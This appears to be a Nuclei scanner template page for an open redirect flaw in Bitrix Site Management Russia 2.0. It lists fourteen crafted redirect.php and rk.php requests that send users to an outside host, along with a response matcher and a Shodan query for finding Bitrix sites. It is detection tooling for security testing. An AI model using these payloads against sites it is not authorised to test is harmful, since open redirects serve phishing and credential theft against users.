Bitrix Site Management Russia 2.0 - Open Redirect

ID: bitrix-open-redirect

Severity: medium

Author: pikpikcu,gtrrnr

Tags: redirect,bitrix,packetstorm

Description

Bitrix Site Management Russia 2.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

id: bitrix-open-redirect

info:
  name: Bitrix Site Management Russia 2.0 - Open Redirect
  author: pikpikcu,gtrrnr
  severity: medium
  description: Bitrix Site Management Russia 2.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 14
    shodan-query: "html:\"/bitrix/\""
  tags: redirect,bitrix,packetstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - '/bitrix/rk.php?goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
        - '/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
        - '/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
        - '/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
        - '/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
        - '/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
        - '/bitrix/redirect.php?goto=https://{{Hostname}}%252F:[email protected]/'
        - '/bitrix/tools/track_mail_click.php?url=http://site%[email protected]/'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
        part: header

      - type: status
        condition: or
        status:
          - 302
          - 301
# digest: 4a0a00473045022100b4b073368c2b6df156f1cfdaf506e9bde892bd94ba0cd6bf0acfc4f3b2bedca6022076649d2313de579d805f4d517e61aa3db07c86e897e463f78084b31a65c813a9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/other/bitrix-open-redirect.yaml"

View on Github